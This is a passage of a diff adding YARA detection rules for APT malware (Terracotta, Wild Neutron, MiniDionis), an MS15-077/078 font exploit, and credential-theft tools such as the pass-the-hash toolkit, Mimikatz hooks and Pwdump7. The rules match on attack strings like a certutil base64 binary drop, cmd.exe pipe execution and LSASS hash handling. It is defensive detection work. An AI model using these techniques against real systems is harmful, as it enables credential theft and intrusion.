+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule Mithozhan_Trojan_RID2D90 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Mitozhan Trojan used in APT Terracotta"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+      date = "2015-08-04 10:37:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "adbrowser" fullword wide
+      $s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" fullword ascii
+      $s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule RemoteExec_Tool_RID2CFF : APT DEMO EXE FILE {
+   meta:
+      description = "Remote Access Tool used in APT Terracotta"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+      date = "2015-08-04 10:13:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "cmd.exe /q /c \"%s\"" fullword ascii
+      $s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+      $s2 = "This is a service executable! Couldn't start directly." fullword ascii
+      $s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii
+      $s4 = "TermHlp_stdout" fullword ascii
+      $s5 = "TermHlp_stdin" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 75KB and 4 of ( $s* )
+}
+
+rule LiuDoor_Malware_2_RID2D88 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Liudoor Trojan used in Terracotta APT"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+      date = "2015-08-04 10:35:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
+      hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "svchostdllserver.dll" fullword ascii
+      $s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule MAL_MiniDionis_VBS_Dropped_RID30B4 : DEMO MAL SCRIPT {
+   meta:
+      description = "Dropped File - 1.vbs"
+      author = "Florian Roth"
+      reference = "https://malwr.com/analysis/ZDc4ZmIyZDI4MTVjNGY5NWI0YzE3YjIzNGFjZTcyYTY/"
+      date = "2015-07-21 12:51:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Wscript.Sleep 5000" ascii
+      $s2 = "Set FSO = CreateObject(\"Scripting.FileSystemObject\")" ascii
+      $s3 = "Set WshShell = CreateObject(\"WScript.Shell\")" ascii
+      $s4 = "If(FSO.FileExists(\"" ascii
+      $s5 = "then FSO.DeleteFile(\".\\" ascii
+   condition: 
+      filesize < 1KB and all of them and $s1 in ( 0 .. 40 )
+}
+
+rule Exploit_MS15_077_078_RID2D56 : DEMO EXE EXPLOIT FILE GEN T1189 {
+   meta:
+      description = "MS15-078 / MS15-077 exploit - generic signature"
+      author = "Florian Roth"
+      reference = "https://code.google.com/p/google-security-research/issues/detail?id=473&can=1&start=200"
+      date = "2015-07-21 10:27:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "18e3e840a5e5b75747d6b961fca66a670e3faef252aaa416a88488967b47ac1c"
+      hash2 = "0b5dc030e73074b18b1959d1cf7177ff510dbc2a0ec2b8bb927936f59eb3d14d"
+      hash3 = "fc609adef44b5c64de029b2b2cff22a6f36b6bdf9463c1bd320a522ed39de5d9"
+      tags = "DEMO, EXE, EXPLOIT, FILE, GEN, T1189"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GDI32.DLL" fullword ascii
+      $s2 = "atmfd.dll" fullword wide
+      $s3 = "AddFontMemResourceEx" fullword ascii
+      $s4 = "NamedEscape" fullword ascii
+      $s5 = "CreateBitmap" fullword ascii
+      $s6 = "DeleteObject" fullword ascii
+      $op0 = { 83 45 e8 01 eb 07 c7 45 e8 } 
+      $op1 = { 8d 85 24 42 fb ff 89 04 24 e8 80 22 00 00 c7 45 } 
+      $op2 = { eb 54 8b 15 6c 00 4c 00 8d 85 24 42 fb ff 89 44 } 
+      $op3 = { 64 00 88 ff 84 03 70 03 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or 3 of ( $op* )
+}
+
+rule MAL_Malicious_SFX1_Voicemail_RID3169 : DEMO FILE MAL {
+   meta:
+      description = "SFX with voicemail content"
+      author = "Florian Roth"
+      reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+      date = "2015-07-20 13:21:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "voicemail" ascii
+      $s1 = ".exe" ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and filesize < 1000KB and $s0 in ( 3 .. 80 ) and $s1 in ( 3 .. 80 )
+}
+
+rule MAL_MiniDionis_readerView_RID30AA : DEMO EXE FILE MAL {
+   meta:
+      description = "MiniDionis Malware - file readerView.exe / adobe.exe"
+      author = "Florian Roth"
+      reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+      date = "2015-07-20 12:49:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
+      hash2 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
+      hash3 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%ws_out%ws" fullword wide
+      $s2 = "dnlibsh" fullword ascii
+      $op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b } 
+      $op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f } 
+      $op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) and 1 of ( $op* )
+}
+
+rule MAL_Malicious_SFX2_Adobe_RID2FAC : DEMO EXE FILE MAL {
+   meta:
+      description = "SFX with adobe.exe content"
+      author = "Florian Roth"
+      reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3950"
+      date = "2015-07-20 12:07:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "adobe.exe" fullword ascii
+      $s2 = "Extracting files to %s folder$Extracting files to temporary folder" fullword wide
+      $s3 = "GETPASSWORD1" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule Binary_Drop_Certutil_RID2F15 : DEMO SUSP T1132 T1140 {
+   meta:
+      description = "Drop binary as base64 encoded cert trick"
+      author = "Florian Roth"
+      reference = "https://goo.gl/9DNn8q"
+      date = "2015-07-15 11:42:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SUSP, T1132, T1140"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "echo -----BEGIN CERTIFICATE----- >" ascii
+      $s1 = "echo -----END CERTIFICATE----- >>" ascii
+      $s2 = "certutil -decode " ascii
+   condition: 
+      filesize < 10KB and all of them
+}
+
+rule AppInitHook_RID2B57 : DEMO EXE FILE HKTL S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "AppInitGlobalHooks-Mimikatz - Hide Mimikatz From Process Lists - file AppInitHook_RID2B57.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Z292v6"
+      date = "2015-07-15 09:02:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, HKTL, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "\\Release\\AppInitHook_RID2B57.pdb" ascii
+      $s1 = "AppInitHook_RID2B57.dll" fullword ascii
+      $s2 = "mimikatz.exe" fullword wide
+      $s3 = "]X86Instruction->OperandSize >= Operand->Length" fullword wide
+      $s4 = "mhook\\disasm-lib\\disasm.c" fullword wide
+      $s5 = "mhook\\disasm-lib\\disasm_x86.c" fullword wide
+      $s6 = "VoidFunc" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
+}
+
+rule WildNeutron_Sample_1_RID2EDD : APT DEMO EXE FILE {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:32:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "LiveUpdater.exe" fullword wide
+      $s1 = "id-at-postalAddress" fullword ascii
+      $s2 = "%d -> %d (default)" fullword wide
+      $s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+      $s8 = "id-ce-keyUsage" fullword ascii
+      $s9 = "Key Usage" fullword ascii
+      $s32 = "UPDATE_ID" fullword wide
+      $s37 = "id-at-commonName" fullword ascii
+      $s38 = "2008R2" fullword wide
+      $s39 = "RSA-alt" fullword ascii
+      $s40 = "%02d.%04d.%s" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule WildNeutron_Sample_2_RID2EDE : APT DEMO EXE FILE T1085 {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:32:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "rundll32.exe \"%s\",#1" fullword wide
+      $s1 = "IgfxUpt.exe" fullword wide
+      $s2 = "id-at-postalAddress" fullword ascii
+      $s3 = "Intel(R) Common User Interface" fullword wide
+      $s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+      $s11 = "Key Usage" fullword ascii
+      $s12 = "Intel Integrated Graphics Updater" fullword wide
+      $s13 = "%sexpires on    : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and all of them
+}
+
+rule WildNeutron_Sample_4_RID2EE0 : APT DEMO EXE FILE T1085 {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:33:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "WinRAT-Win32-Release.exe" fullword ascii
+      $s0 = "rundll32.exe \"%s\",#1" fullword wide
+      $s1 = "RtlUpd.EXE" fullword wide
+      $s2 = "RtlUpd.exe" fullword wide
+      $s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide
+      $s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide
+      $s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+      $s6 = "Key Usage" fullword ascii
+      $s7 = "id-at-serialNumber" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1240KB and all of them
+}
+
+rule WildNeutron_Sample_5_RID2EE1 : APT DEMO EXE FILE {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:33:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "LiveUpdater.exe" fullword wide
+      $s1 = "id-at-postalAddress" fullword ascii
+      $s2 = "%d -> %d (default)" fullword wide
+      $s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
+      $s4 = "sha-1WithRSAEncryption" fullword ascii
+      $s5 = "Postal code" fullword ascii
+      $s6 = "id-ce-keyUsage" fullword ascii
+      $s7 = "Key Usage" fullword ascii
+      $s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii
+      $s9 = "%02d.%04d.%s" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+}
+
+rule WildNeutron_Sample_6_RID2EE2 : APT DEMO EXE FILE {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:33:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "mshtaex.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 310KB and all of them
+}
+
+rule WildNeutron_Sample_7_RID2EE3 : APT DEMO EXE FILE {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:33:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii
+      $s1 = "PEM_read_bio_PrivateKey failed" fullword ascii
+      $s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii
+      $s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii
+      $s4 = "clapi32.dll" fullword ascii
+      $s5 = "Connection from %s port %d" fullword ascii
+      $s6 = "/usr/etc/ssh_known_hosts" fullword ascii
+      $s7 = "Version: %s - %s %s %s %s" fullword ascii
+      $s8 = "[-] connect()" fullword ascii
+      $s9 = "/bin/sh /usr/etc/sshrc" fullword ascii
+      $s10 = "kexecdhs.c" fullword ascii
+      $s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+}
+
+rule WildNeutron_Sample_9_RID2EE5 : APT DEMO EXE FILE {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:34:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "http://get.adobe.com/flashplayer/" wide
+      $s4 = " Player Installer/Uninstaller" fullword wide
+      $s5 = "Adobe Flash Plugin Updater" fullword wide
+      $s6 = "uSOFTWARE\\Adobe" fullword wide
+      $s11 = "2008R2" fullword wide
+      $s12 = "%02d.%04d.%s" fullword wide
+      $s13 = "%d -> %d" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 1477KB and all of them
+}
+
+rule WildNeutron_Sample_10_RID2F0D : APT DEMO EXE FILE {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 11:40:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii
+      $s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii
+      $s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii
+      $s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii
+      $s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii
+      $s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii
+      $s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii
+      $s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii
+      $s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii
+      $s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii
+      $s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii
+      $s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii
+      $x1 = "wdigestEx.dll" fullword ascii
+      $x2 = "dpcore16t.dll" fullword ascii
+      $x3 = "mspool.dll" fullword ascii
+      $x4 = "msvcse.exe" fullword ascii
+      $x5 = "mshtaex.exe" fullword wide
+      $x6 = "iastor32.exe" fullword ascii
+      $y1 = "Installer.exe" fullword ascii
+      $y2 = "Info: Process %s" fullword ascii
+      $y3 = "Error: GetFileTime %s 0x%x" fullword ascii
+      $y4 = "Install succeeded" fullword ascii
+      $y5 = "Error: RegSetValueExA 0x%x" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ( $s* ) and 1 of ( $x* ) and 3 of ( $y* ) ) )
+}
+
+rule APT_MAL_WildNeutron_javacpl_RID3149 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Wild Neutron APT Sample Rule"
+      author = "Florian Roth"
+      reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
+      date = "2015-07-10 13:16:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
+      hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
+      hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
+      $s2 = "cmdcmdline" wide fullword
+      $s3 = "\"%s\" /K %s" wide fullword
+      $s4 = "Process is not running any more" wide fullword
+      $s5 = "dpnxfsatz" wide fullword
+      $op1 = { ff d6 50 ff 15 ?? ?? 43 00 8b f8 85 ff 74 34 83 64 24 0c 00 e8 ?? ?? 02 00 } 
+      $op2 = { b8 02 00 00 00 01 45 80 01 45 88 6a 00 47 52 89 7d 8c 03 d8 } 
+      $op3 = { 8b c7 f7 f6 46 89 b5 c8 fd ff ff 0f b7 c0 8b c8 0f af ce 3b cf } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 5MB and ( all of ( $s* ) or all of ( $op* ) )
+}
+
+rule whosthere_alt_RID2C8A : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 09:53:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+      $s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
+      $s2 = "dump output to a file, -o filename" fullword ascii
+      $s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii
+      $s4 = "Error: pth.dll is not in the current directory!." fullword ascii
+      $s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii
+      $s6 = ".\\pth.dll" fullword ascii
+      $s7 = "Cannot get LSASS.EXE PID!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 280KB and 2 of them
+}
+
+rule iam_alt_iam_alt_RID2D1E : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule - file iam-alt.exe"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 10:18:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
+      $s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+      $s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii
+      $s3 = "username:domainname:lmhash:nthash" fullword ascii
+      $s4 = "Error in cmdline!. Bye!." fullword ascii
+      $s5 = "Error: Cannot open LSASS.EXE!." fullword ascii
+      $s6 = "nthash is too long!." fullword ascii
+      $s7 = "LSASS HANDLE: %x" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
+}
+
+rule genhash_genhash_RID2D2C : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule - file genhash.exe"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 10:20:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "genhash.exe <password>" fullword ascii
+      $s3 = "Password: %s" fullword ascii
+      $s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii
+      $s5 = "This tool generates LM and NT hashes." fullword ascii
+      $s6 = "(hashes format: LM Hash:NT hash)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+}
+
+rule iam_iamdll_RID2B1A : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule - file iamdll.dll"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 08:52:11"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "LSASRV.DLL" fullword ascii
+      $s1 = "iamdll.dll" fullword ascii
+      $s2 = "ChangeCreds" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 115KB and all of them
+}
+
+rule iam_iam_RID29DE : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule - file iam.exe"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 01:55:01"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
+      $s2 = "iam.exe -h administrator:mydomain:" ascii
+      $s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii
+      $s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii
+      $s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii
+      $s6 = "Error in cmdline!. Bye!." fullword ascii
+      $s7 = "Checking LSASRV.DLL...." fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them
+}
+
+rule whosthere_alt_pth_RID2E35 : APT DEMO EXE FILE T1075 {
+   meta:
+      description = "Semiautomatically generated YARA rule - file pth.dll"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 11:04:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, T1075"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "c:\\debug.txt" fullword ascii
+      $s1 = "pth.dll" fullword ascii
+      $s2 = "\"Primary\" string found at %.8Xh" fullword ascii
+      $s3 = "\"Primary\" string not found!" fullword ascii
+      $s4 = "segment 1 found at %.8Xh" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 240KB and 4 of them
+}
+
+rule whosthere_RID2AEA : APT DEMO EXE FILE {
+   meta:
+      description = "Semiautomatically generated YARA rule - file whosthere_RID2AEA.exe"
+      author = "Florian Roth"
+      reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+      date = "2015-07-10 09:21:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+      $s2 = "whosthere_RID2AEA enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
+      $s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
+      $s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii
+      $s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii
+      $s6 = "Cannot get LSASS.EXE PID!" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 320KB and 2 of them
+}
+
+rule CN_Honker_Pwdump7_Pwdump7_RID308E : CHINA DEMO SCRIPT SUSP {
+   meta:
+      description = "Script from disclosed CN Honker Pentest Toolset - file Pwdump7.bat"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
+      date = "2015-06-23 12:44:51"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CHINA, DEMO, SCRIPT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Pwdump7.exe >pass.txt" fullword ascii
+   condition: 
+      filesize < 1KB and all of them
+}
+
+rule CN_Honker_mempodipper2_6_RID3030 : CHINA DEMO HKTL {
+   meta:
+      description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
+      author = "Florian Roth"
+      reference = "Disclosed CN Honker Pentest Toolset"
